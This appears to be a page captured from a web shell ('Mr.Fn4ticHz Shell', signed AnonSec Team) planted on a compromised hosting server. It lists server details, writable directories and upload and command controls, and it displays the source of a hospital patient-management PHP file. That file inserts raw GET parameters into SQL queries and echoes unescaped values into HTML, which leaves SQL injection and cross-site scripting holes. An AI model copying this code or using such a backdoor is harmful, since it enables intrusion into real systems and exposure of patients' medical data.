Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.191.62.122
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/www/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/btiyawmy/www/login.easenup.in/showradio.php
<?php session_start();
require_once("../patientmanager.php");
require_once("../DBManager.php");
include("dashboarddocument.php");
?>
<div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
  
    <table id="example2" class="table table-bordered table-hover">
            <div class='card-header d-flex p-0'>
                    <ul class='nav nav-pills ml-auto p-2'>
                        <tr>
         <th><strong>Investigation Details</strong></th>
         <th><strong>Category</strong></th>
         <th><strong>Result</strong></th> 
          <th><strong>Report</strong></th>
          </tr>
 <?php
		$sql ="SELECT * FROM investigation WHERE  prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' And Investigation_type='Radiology' AND Priority_slip='Urgent'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		?>
          <?php
		$sql ="SELECT * FROM investigation WHERE  prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' And Investigation_type='Radiology' AND Priority_slip='Urgent'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
            echo "<tr style='background-color:#FFF2F2'>
    <td><b>Created At :</b>$rs[created_at]
    <br><b>Raised_at :</b> $rs[Raised_at]
    </td><td>
    ";
      $sqlpatient1 = "SELECT * FROM labdepartment WHERE labdepartmentid='$rs[Category]'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
       echo"$rsn[lab_department_name]";
       
	}
	
      $sqlpatient1 = "SELECT * FROM radiobodypart WHERE radiobodypartid='$rs[Sub_Category]'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
       echo" -$rsn[bodypart]";
       
	}
    
    $sqlpatient1 = "SELECT * FROM list_Investigation WHERE ivid='$rs[Investigation]'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
       echo"-<b>$rsn[Investigation]</b>";
       
	}
	echo"</td> 
  
    ";
                     
      if($rs[Evidence] == ''){
      echo" <td>Pending</td>
    <td> <u><a href='update_radio.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&id=$rs[id]'> Upload Report</a></u></span></td>
                       ";
      }
      elseif($rs[Result] == 'Done')
      {
          echo "<td>Report Generator</td>
          <td><u><a href='show_upatediagostic_report.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&id=$rs[id]'> View Report</a></u>   "; 
      }
      
      else{
          echo "<td>Evidence Uploaded <br> Report Pending</td>
          <td><u><a href='creatediagnostic.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&id=$rs[id]'> Create Report</a></u>   ";
}

}
echo"</tr> ";
?>  
<?php
}
?>

<?php
		$sql ="SELECT * FROM investigation WHERE  prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' And Investigation_type='Radiology' AND Priority_slip='Normal'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		?>
		<tr>
          <?php
		$sql ="SELECT * FROM investigation WHERE  prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' And Investigation_type='Radiology' AND Priority_slip='Normal'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
            echo "
    <td><b>Created At :</b>$rs[created_at]
    <br><b>Raised_at :</b> $rs[Raised_at]</td>
    <td>
    ";
      $sqlpatient1 = "SELECT * FROM labdepartment WHERE labdepartmentid='$rs[Category]'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
       echo"$rsn[lab_department_name]";
       
	}
	
      $sqlpatient1 = "SELECT * FROM radiobodypart WHERE radiobodypartid='$rs[Sub_Category]'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
       echo" -$rsn[bodypart]";
       
	}
    
    $sqlpatient1 = "SELECT * FROM list_Investigation WHERE ivid='$rs[Investigation]'";
	$qsqlpatient1 = mysqli_query($con,$sqlpatient1);
	while($rsn = mysqli_fetch_array($qsqlpatient1))
	{
       echo"-<b>$rsn[Investigation]</b>";
       
	}
	echo"</td> 
  
    ";
                  
      if($rs[Evidence] == ''){
      echo" <td>Pending</td>
    <td> <u><a href='update_radio.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&id=$rs[id]'> Upload Report</a></u></span></td>
                       ";
      }
      elseif($rs[Result] == 'Done')
      {
          echo "<td>Report Generator</td>
          <td><u><a href='show_upatediagostic_report.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&id=$rs[id]'> View Report</a></u>   "; 
      }
      
      else{
          echo "<td>Evidence Uploaded <br> Report Pending</td>
          <td><u><a href='creatediagnostic.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&id=$rs[id]'> Create Report</a></u>   ";
}


echo" </tr>";
}
?>  
    
<?php
}
?>
 
    </div>
     </table>

Anon7 - 2022
AnonSec Team